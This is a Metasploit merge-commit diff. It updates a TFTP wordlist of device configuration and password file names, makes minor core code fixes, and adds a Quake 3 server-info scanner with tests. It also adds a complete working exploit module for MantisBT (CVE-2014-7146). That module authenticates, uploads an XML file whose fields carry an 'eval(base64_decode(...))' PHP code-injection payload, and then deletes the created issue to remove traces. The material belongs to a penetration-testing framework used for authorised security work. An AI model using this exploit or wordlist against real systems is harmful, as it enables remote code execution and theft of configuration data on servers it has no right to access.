Merge branch 'master' into feature/MSP-11605/lazy-thread-creation

MSP-11605

data/wordlists/tftp.txt

@@ -1,5 +1,7 @@
-000000000000-directory~.xml
 000000000000.cfg
+000000000000-directory~.xml
+000000000000-directory.xml
+000000000000-phone.cfg
 256T.CM
 323tosip1_1.bin
 4601_02_readme_R2_3.txt
@@ -18,26 +20,6 @@
 46xxupgrade.scr
 6100-113.bin
 7200-118.bin
-CFE.bin
-CP7912010301SIP050608A.sbin
-OS79XX.TXT
-P003-07-5-00.bin
-P003-07-5-00.sbn
-P0S3-07-5-00.bin
-P0S3-07-5-00.loads
-P0S3-07-5-00.sb2
-RINGLIST.DAT
-SEP000F34118045.cnf
-SEP001562EA69E8.cnf
-SEPDefault.cnf
-SIP000F34118045.cnf
-SIPDefault.cnf
-SIPinsertMAChere.cnf
-SoundPointIPLocalization
-SoundPointIPWelcome.wav
-TECfg.bin
-TEImage.bin
-XMLDefault.cnf.xml
 a01d01b2_3.bin
 a02d01b2_3.bin
 a10d01b2_3.bin
@@ -46,98 +28,144 @@ a20d01b2_3.bin
 a25d01a2_5.bin
 aastra.cfg
 active/system.ini
-admin-config
 admin.bin
 admin.cfg
-administrator-config
+admin-confg
+admin-config
 administrator.bin
 administrator.cfg
+administrator-config
+applications.cfg
 b01d01b2_3.bin
 b02d01b2_3.bin
 b10d01b2_3.bin
 b20d01a2_3.bin
 b20d01b2_3.bin
 b25d01a2_5.bin
-backup-config
 backup.bin
 backup.cfg
+backup-config
 backup.img
 bbla0_83.bin
-boot-config
 boot.bin
 boot.cfg
-boot.txt
+boot-config
 bootrom.ld
+boot.txt
+bridge-confg
+CFE.bin
 cfg.bin
-cisco_util
+cisco-confg
 cisconet.bin
 cisconet.cfg
 ciscortr.bin
 ciscortr.cfg
-code-config
+cisco_util
 code.bin
 code.cfg
+code-config
 code.img
 config.bin
 config.dump
 config.ini
 config.txt
+CP7912010301SIP050608A.sbin
 cvt01_2_3.bin
 cvt02_2_3.bin
 cvt02sw_2_3.bin
 debian.cfg
 def06r1_8_3.bin
 def24r1_8_3.bin
-default-config
 default.bin
 default.cfg
+default-config
 default.ini
-device-config
 device.bin
 device.cfg
+device-config
 dialplan.xml
 dump.dmc
-firmware-config
+features.cfg
+firewall-nat.cfg
 firmware.bin
 firmware.cfg
+firmware-config
 firmware.img
+gateway-confg
 gkdefault.cfg
+gw-confg
+H323.cfg
 ifIndex-table
-image-config
 image.bin
 image.cfg
+image-config
 image.eim
 image.out
 infrared.txt
-local-config
 local.bin
 local.cfg
-main-config
+local-config
+lync.cfg
 main.bin
 main.cfg
+main-config
 main.img
 merlin2.pcm
+myrouter-confg
 n831r0.bin
 n84r1.bin
 nir4113.bin
 nir539R4.bin
+OS79XX.TXT
+P003-07-5-00.bin
+P003-07-5-00.sbn
+P003-08-11-00.bin
+P003-08-11-00.sbn
+P003-08-2-00.bin
+P003-08-2-00.sbn
+P003-08-3-00.bin
+P003-08-3-00.sbn
+P003-08-6-00.bin
+P003-08-6-00.sbn
+P003-08-9-00.bin
+P003-08-9-00.sbn
+P003-8-12-00.bin
+P003-8-12-00.sbn
+P0S3-07-5-00.bin
+P0S3-07-5-00.loads
+P0S3-07-5-00.sb2
+P0S3-08-11-00.loads
+P0S3-08-11-00.sb2
+P0S3-08-2-00.loads
+P0S3-08-2-00.sb2
+P0S3-08-3-00.loads
+P0S3-08-3-00.sb2
+P0S3-08-6-00.loads
+P0S3-08-6-00.sb2
+P0S3-08-9-00.loads
+P0S3-08-9-00.sb2
+P0S3-8-12-00.loads
+P0S3-8-12-00.sb2
 passwd.bin
 passwd.cfg
 passwd.ini
 password.bin
 password.cfg
 password.ini
-persistent-data
 persistent.bin
 persistent.cfg
+persistent-data
 phbook00e011010455.txt
 phone1.cfg
+polycomConfig.xsd
+polycom.xml
 prestige
 prestige.bin
 prestige.cfg
-private-config
 private.bin
 private.cfg
+private-config
+pstn.cfg
 public.bin
 public.cfg
 pwd.bin
@@ -148,47 +176,73 @@ pxelinux.cfg/default
 ram
 ram-0
 ras
-ras-0
-ras-1
 ras0
+ras-0
 ras1
+ras-1
+reg-advanced.cfg
+reg-basic.cfg
+region.cfg
 release.xml
-remote-config
 remote.bin
 remote.cfg
+remote-config
+RINGLIST.DAT
 rom
-rom-0
-rom-1
 rom0
+rom-0
 rom1
-router-confg
+rom-1
 router.bin
 router.cfg
+router-confg
 s10d01b2_2.bin
 s20d01b2_2.bin
-secret-config
 secret.bin
 secret.cfg
-sip.cfg
-sip.ld
-sip.ver
-sip_4602D01A.txt
-sip_4602D02A.txt
+secret-config
+SEP000F34118045.cnf
+SEP001562EA69E8.cnf
+SEPDefault.cnf
+SIP000F34118045.cnf
+sip_327.cfg
 sip_4602ap1_1.ebin
 sip_4602bt1_1.ebin
+sip_4602D01A.txt
+sip_4602D02A.txt
+sip-basic.cfg
+sip.cfg
+sip-confg
+SIPDefault.cnf
+SIPinsertMAChere.cnf
+sip-interop.cfg
+sip.ld
 sipto323_1_1.ebin
-startup-config
+sip.ver
+site.cfg
+SoundPointIPLocalization
+SoundPointIPWelcome.wav
 startup.bin
 startup.cfg
+startup-config
 syncinfo.xml
-system-config
 system.bin
 system.cfg
+system-config
 system.img
 system.ini
+TECfg.bin
+TEImage.bin
 test
 test.txt
+text.txt
 uip200_463enc.pac
 uniden00e011030397.txt
 unidencom.txt
 v2210c.bin
+version.info
+video.cfg
+video-integration.cfg
+vip-confg
+voip-confg
+XMLDefault.cnf.xml

lib/msf/core/db_manager/note.rb

@@ -75,9 +75,10 @@ module Msf::DBManager::Note
       if (opts[:port])
         proto = nil
         sname = nil
-        case opts[:proto].to_s.downcase # Catch incorrect usages
+        proto_lower = opts[:proto].to_s.downcase # Catch incorrect usages
+        case proto_lower
         when 'tcp','udp'
-          proto = opts[:proto]
+          proto = proto_lower
           sname = opts[:sname] if opts[:sname]
         when 'dns','snmp','dhcp'
           proto = 'udp'
@@ -166,4 +167,4 @@ module Msf::DBManager::Note
     ret[:note] = note
   }
   end
-end
+end

lib/msf/core/module/module_info.rb

@@ -74,7 +74,7 @@ module Msf::Module::ModuleInfo
   # Checks and merges the supplied key/value pair in the supplied hash.
   #
   def merge_check_key(info, name, val)
-    if (self.respond_to?("merge_info_#{name.downcase}"))
+    if (self.respond_to?("merge_info_#{name.downcase}", true))
       eval("merge_info_#{name.downcase}(info, val)")
     else
       # If the info hash already has an entry for this name

lib/rex/proto/quake.rb

@@ -0,0 +1,3 @@
+# -*- coding: binary -*-
+
+require 'rex/proto/quake/message'

lib/rex/proto/quake/message.rb

@@ -0,0 +1,73 @@
+# -*- coding: binary -*-
+
+module Rex
+module Proto
+##
+#
+# Quake 3 protocol, taken from ftp://ftp.idsoftware.com/idstuff/quake3/docs/server.txt
+#
+##
+module Quake
+  HEADER = 0xFFFFFFFF
+
+  def decode_message(message)
+    # minimum size is header (4) + <command> + <stuff>
+    return if message.length < 7
+    header = message.unpack('N')[0]
+    return if header != HEADER
+    message[4, message.length]
+  end
+
+  def encode_message(payload)
+    [HEADER].pack('N') + payload
+  end
+
+  def getstatus
+    encode_message('getstatus')
+  end
+
+  def getinfo
+    encode_message('getinfo')
+  end
+
+  def decode_infostring(infostring)
+    # decode an "infostring", which is just a (supposedly) quoted string of tokens separated
+    # by backslashes, generally terminated with a newline
+    token_re = /([^\\]+)\\([^\\]+)/
+    return nil unless infostring =~ token_re
+    # remove possibly present leading/trailing double quote
+    infostring.gsub!(/(?:^"|"$)/, '')
+    # remove the trailing \n, if present
+    infostring.gsub!(/\n$/, '')
+    # split on backslashes and group into key value pairs
+    infohash = {}
+    infostring.scan(token_re).each do |kv|
+      infohash[kv.first] = kv.last
+    end
+    infohash
+  end
+
+  def decode_response(message, type)
+    resp = decode_message(message)
+    if /^print\n(?<error>.*)\n?/m =~ resp
+      # XXX: is there a better exception to throw here?
+      fail ::ArgumentError, "#{type} error: #{error}"
+    # why doesn't this work?
+    # elsif /^#{type}Response\n(?<infostring>.*)/m =~ resp
+    elsif resp =~ /^#{type}Response\n(.*)/m
+      decode_infostring(Regexp.last_match(1))
+    else
+      nil
+    end
+  end
+
+  def decode_status(message)
+    decode_response(message, 'status')
+  end
+
+  def decode_info(message)
+    decode_response(message, 'info')
+  end
+end
+end
+end

modules/auxiliary/scanner/quake/server_info.rb

@@ -0,0 +1,88 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/proto/quake'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::UDPScanner
+  include Rex::Proto::Quake
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Gather Quake Server Information',
+        'Description'   => %q(
+          This module uses the getstatus or getinfo request to obtain
+          information from a Quakeserver.
+        ),
+        'Author'        => 'Jon Hart <jon_hart[at]rapid7.com',
+        'References'    =>
+          [
+            ['URL', 'ftp://ftp.idsoftware.com/idstuff/quake3/docs/server.txt']
+          ],
+        'License'       => MSF_LICENSE,
+        'Actions'       => [
+          ['status', 'Description' => 'Use the getstatus command'],
+          ['info', 'Description' => 'Use the getinfo command']
+        ],
+        'DefaultAction' => 'status'
+      )
+    )
+
+    register_options(
+    [
+      Opt::RPORT(27960)
+    ], self.class)
+  end
+
+  def build_probe
+    @probe ||= case action.name
+               when 'status'
+                 getstatus
+               when 'info'
+                 getinfo
+               end
+  end
+
+  def decode_stuff(response)
+    case action.name
+    when 'info'
+      stuff = decode_info(response)
+    when 'status'
+      stuff = decode_status(response)
+    end
+
+    if datastore['VERBOSE']
+      stuff.inspect
+    else
+      # try to get the host name, game name and version
+      stuff.select { |k, _| %w(hostname sv_hostname gamename com_gamename version).include?(k) }
+    end
+  end
+
+  def scanner_process(response, src_host, src_port)
+    stuff = decode_stuff(response)
+    return unless stuff
+    @results[src_host] ||= []
+    print_good("#{src_host}:#{src_port} found '#{stuff}'")
+    @results[src_host] << stuff
+  end
+
+  def scanner_postscan(_batch)
+    @results.each_pair do |host, stuff|
+      report_host(host: host)
+      report_service(
+        host: host,
+        proto: 'udp',
+        port: rport,
+        name: 'Quake',
+        info: stuff
+      )
+    end
+  end
+end

modules/exploits/multi/http/mantisbt_php_exec.rb

@@ -0,0 +1,290 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability',
+      'Description'    => %q{
+        This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.
+        The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
+        This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Egidio Romano', # discovery http://karmainsecurity.com
+          'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-7146']
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Generic (PHP Payload)', {}]],
+      'DisclosureDate' => 'Nov 8 2014',
+      'DefaultTarget'  => 0))
+
+      register_options(
+      [
+        OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']),
+        OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']),
+        OptString.new('TARGETURI', [ true, 'Base directory path', '/'])
+      ], self.class)
+  end
+
+  def check
+    res = exec_php('phpinfo(); die();', true)
+
+    if res && res.body =~ /This program makes use of the Zend/
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def do_login()
+    print_status('Checking access to MantisBT...')
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
+      'vars_get' => {
+        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
+      }
+    })
+
+    fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && res.code == 200
+
+    session_cookie = res.get_cookies
+
+    print_status('Logging in...')
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'login.php'),
+      'cookie'    => session_cookie,
+      'vars_post' => {
+        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
+        'username' => datastore['username'],
+        'password' => datastore['password'],
+        'secure_session' => 'on'
+      }
+    })
+
+
+    fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
+
+    fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/
+
+    "#{session_cookie} #{res.get_cookies}"
+  end
+
+  def upload_xml(payload_b64, rand_text, cookies, is_check)
+
+    if is_check
+      timeout = 20
+    else
+      timeout = 3
+    end
+
+    rand_num = Rex::Text.rand_text_numeric(1, 9)
+
+    print_status('Checking XmlImportExport plugin...')
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'plugin.php'),
+      'cookie'   => cookies,
+      'vars_get' => {
+        'page' => 'XmlImportExport/import'
+      }
+    })
+
+    unless res && res.code == 200
+      print_error('Error trying to access XmlImportExport/import page...')
+      return false
+    end
+
+    # Retrieving CSRF token
+    if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/
+      csrf_token = Regexp.last_match[1]
+    else
+      print_error('Error trying to read CSRF token')
+      return false
+    end
+
+    # Retrieving default project id
+    if res.body =~ /name="project_id" value="([0-9]+)"/
+      project_id = Regexp.last_match[1]
+    else
+      print_error('Error trying to read project id')
+      return false
+    end
+
+    # Retrieving default category id
+    if res.body =~ /name="defaultcategory">[.|\r|\r\n]*<option value="([0-9])" selected="selected" >\(select\)<\/option><option value="1">\[All Projects\] (.*)<\/option>/
+      category_id = Regexp.last_match[1]
+      category_name = Regexp.last_match[2]
+    else
+      print_error('Error trying to read default category')
+      return false
+    end
+
+    # Retrieving default max file size
+    if res.body =~ /name="max_file_size" value="([0-9]+)"/
+      max_file_size = Regexp.last_match[1]
+    else
+      print_error('Error trying to read default max file size')
+      return false
+    end
+
+    # Retrieving default step
+    if res.body =~ /name="step" value="([0-9]+)"/
+      step = Regexp.last_match[1]
+    else
+      print_error('Error trying to read default step value')
+      return false
+    end
+
+    xml_file =   %Q|
+    <mantis version="1.2.17" urlbase="http://localhost/" issuelink="${eval(base64_decode(#{ payload_b64 }))}}" notelink="~" format="1">
+        <issue>
+            <id>#{ rand_num }</id>
+            <project id="#{ project_id }">#{ rand_text }</project>
+            <reporter id="#{ rand_num }">#{ rand_text }</reporter>
+            <priority id="30">normal</priority>
+            <severity id="50">minor</severity>
+            <reproducibility id="70">have not tried</reproducibility>
+            <status id="#{ rand_num }">new</status>
+            <resolution id="#{ rand_num }">open</resolution>
+            <projection id="#{ rand_num }">none</projection>
+            <category id="#{ category_id }">#{ category_name }</category>
+            <date_submitted>1415492267</date_submitted>
+            <last_updated>1415507582</last_updated>
+            <eta id="#{ rand_num }">none</eta>
+            <view_state id="#{ rand_num }">public</view_state>
+            <summary>#{ rand_text }</summary>
+            <due_date>1</due_date>
+            <description>{${eval(base64_decode(#{ payload_b64 }))}}1</description>
+        </issue>
+    </mantis>
+    |
+
+    data = Rex::MIME::Message.new
+    data.add_part("#{ csrf_token }", nil, nil, "form-data; name=\"plugin_xml_import_action_token\"")
+    data.add_part("#{ project_id }", nil, nil, "form-data; name=\"project_id\"")
+    data.add_part("#{ max_file_size }", nil, nil, "form-data; name=\"max_file_size\"")
+    data.add_part("#{ step }", nil, nil, "form-data; name=\"step\"")
+    data.add_part(xml_file, "text/xml", "UTF-8", "form-data; name=\"file\"; filename=\"#{ rand_text }.xml\"")
+    data.add_part("renumber", nil, nil, "form-data; name=\"strategy\"")
+    data.add_part("link", nil, nil, "form-data; name=\"fallback\"")
+    data.add_part("on", nil, nil, "form-data; name=\"keepcategory\"")
+    data.add_part("#{ category_id }", nil, nil, "form-data; name=\"defaultcategory\"")
+    data_post = data.to_s
+
+    print_status('Sending payload...')
+    return send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),
+      'cookie' => cookies,
+      'ctype'   => "multipart/form-data; boundary=#{ data.bound }",
+      'data'    => data_post
+    }, timeout)
+  end
+
+  def exec_php(php_code, is_check = false)
+
+    # remove comments, line breaks and spaces of php_code
+    payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
+
+    # clean b64 payload
+    while Rex::Text.encode_base64(payload_clean) =~ /=/
+      payload_clean = "#{ payload_clean } "
+    end
+    payload_b64 = Rex::Text.encode_base64(payload_clean)
+
+    rand_text = Rex::Text.rand_text_alpha(5, 8)
+
+    cookies = do_login()
+
+    res_payload = upload_xml(payload_b64, rand_text, cookies, is_check)
+
+    # When a meterpreter session is active, communication with the application is lost.
+    # Must login again in order to recover the communication. Thanks to @FireFart for figure out how to fix it.
+    cookies = do_login()
+
+    print_status("Deleting issue (#{ rand_text })...")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'my_view_page.php'),
+      'cookie' => cookies
+    })
+
+    unless res && res.code == 200
+      print_error('Error trying to access My View page')
+      return false
+    end
+
+    if res.body =~ /title="\[@[0-9]+@\] #{ rand_text }">0+([0-9]+)<\/a>/
+      issue_id = Regexp.last_match[1]
+     else
+      print_error('Error trying to retrieve issue id')
+      return false
+    end
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'bug_actiongroup_page.php'),
+      'cookie'   => cookies,
+      'vars_get' => {
+        'bug_arr[]' => issue_id,
+        'action' => 'DELETE',
+      },
+    })
+
+    if res && res.body =~ /name="bug_actiongroup_DELETE_token" value="(.*)"\/>/
+      csrf_token = Regexp.last_match[1]
+    else
+      print_error('Error trying to retrieve CSRF token')
+      return false
+    end
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'bug_actiongroup.php'),
+      'cookie'   => cookies,
+      'vars_post' => {
+        'bug_actiongroup_DELETE_token' => csrf_token,
+        'bug_arr[]' => issue_id,
+        'action' => 'DELETE',
+      },
+    })
+
+    if res && res.code == 302 || res.body !~ /Issue #{ issue_id } not found/
+      print_status("Issue number (#{ issue_id }) removed")
+    else
+      print_error("Removing issue number (#{ issue_id }) has failed")
+      return false
+    end
+
+    # if check return the response
+    if is_check
+      return res_payload
+    else
+      return true
+    end
+  end
+
+  def exploit
+    unless exec_php(payload.encoded)
+      fail_with(Failure::Unknown, 'Exploit failed, aborting.')
+    end
+  end
+end

spec/lib/rex/proto/quake/info_response.bin

@@ -0,0 +1,2 @@
+ÿÿÿÿinfoResponse
+\voip\1\g_needpass\0\pure\1\gametype\0\sv_maxclients\8\g_humanplayers\0\clients\0\mapname\q3dm2\hostname\noname\protocol\68\gamename\Quake3Arena

spec/lib/rex/proto/quake/message_spec.rb

@@ -0,0 +1,104 @@
+# -*- coding: binary -*-
+require 'spec_helper'
+require 'rex/proto/quake/message'
+
+describe Rex::Proto::Quake do
+  subject do
+    mod = Module.new
+    mod.extend described_class
+    mod
+  end
+
+  describe '#encode_message' do
+    it 'should properly encode messages' do
+      message = subject.encode_message('getinfo')
+      expect(message).to eq("\xFF\xFF\xFF\xFFgetinfo")
+    end
+  end
+
+  describe '#decode_message' do
+    it 'should not decode overly short messages' do
+      expect(subject.decode_message('foo')).to eq(nil)
+    end
+
+    it 'should not decode unknown messages' do
+      expect(subject.decode_message("\xFF\xFF\xFF\x01blahblahblah")).to eq(nil)
+    end
+
+    it 'should properly decode valid messages' do
+      expect(subject.decode_message(subject.getstatus)).to eq('getstatus')
+    end
+  end
+
+  describe '#decode_infostring' do
+    it 'should not decode things that are not infostrings' do
+      expect(subject.decode_infostring('this is not an infostring')).to eq(nil)
+    end
+
+    it 'should properly decode infostrings' do
+      expect(subject.decode_infostring('a\1\b\2\c\blah')).to eq(
+        'a' => '1', 'b' => '2', 'c' => 'blah'
+      )
+    end
+  end
+
+  describe '#decode_response' do
+    it 'should raise when server-side errors are encountered' do
+      expect do
+        subject.decode_response(subject.encode_message("print\nsomeerror\n"))
+      end.to raise_error(::ArgumentError)
+    end
+  end
+
+  describe '#decode_info' do
+    it 'should decode info responses properly' do
+      expected_info = {
+        "clients" => "0",
+        "g_humanplayers" => "0",
+        "g_needpass" => "0",
+        "gamename" => "Quake3Arena",
+        "gametype" => "0",
+        "hostname" => "noname",
+        "mapname" => "q3dm2",
+        "protocol" => "68",
+        "pure" => "1",
+        "sv_maxclients" => "8",
+        "voip" => "1"
+      }
+      actual_info = subject.decode_info(IO.read(File.join(File.dirname(__FILE__), 'info_response.bin')))
+      expect(actual_info).to eq(expected_info)
+    end
+  end
+
+  describe '#decode_status' do
+    it 'should decode status responses properly' do
+      expected_status = {
+        "bot_minplayers" => "0",
+        "capturelimit" => "8",
+        "com_gamename" => "Quake3Arena",
+        "com_protocol" => "71",
+        "dmflags" => "0",
+        "fraglimit" => "30",
+        "g_gametype" => "0",
+        "g_maxGameClients" => "0",
+        "g_needpass" => "0",
+        "gamename" => "baseq3",
+        "mapname" => "q3dm2",
+        "sv_allowDownload" => "0",
+        "sv_dlRate" => "100",
+        "sv_floodProtect" => "1",
+        "sv_hostname" => "noname",
+        "sv_maxPing" => "0",
+        "sv_maxRate" => "10000",
+        "sv_maxclients" => "8",
+        "sv_minPing" => "0",
+        "sv_minRate" => "0",
+        "sv_privateClients" => "0",
+        "timelimit" => "25",
+        "version" => "ioq3 1.36+svn2202-1/Ubuntu linux-x86_64 Dec 12 2011"
+      }
+      actual_status = subject.decode_status(IO.read(File.join(File.dirname(__FILE__), 'status_response.bin')))
+      expect(actual_status).to eq(expected_status)
+    end
+  end
+end

spec/lib/rex/proto/quake/status_response.bin

@@ -0,0 +1,2 @@
+ÿÿÿÿstatusResponse
+\capturelimit\8\g_maxGameClients\0\sv_floodProtect\1\sv_maxPing\0\sv_minPing\0\sv_dlRate\100\sv_maxRate\10000\sv_minRate\0\sv_maxclients\8\sv_hostname\noname\timelimit\25\fraglimit\30\dmflags\0\version\ioq3 1.36+svn2202-1/Ubuntu linux-x86_64 Dec 12 2011\com_gamename\Quake3Arena\com_protocol\71\g_gametype\0\mapname\q3dm2\sv_privateClients\0\sv_allowDownload\0\bot_minplayers\0\gamename\baseq3\g_needpass\0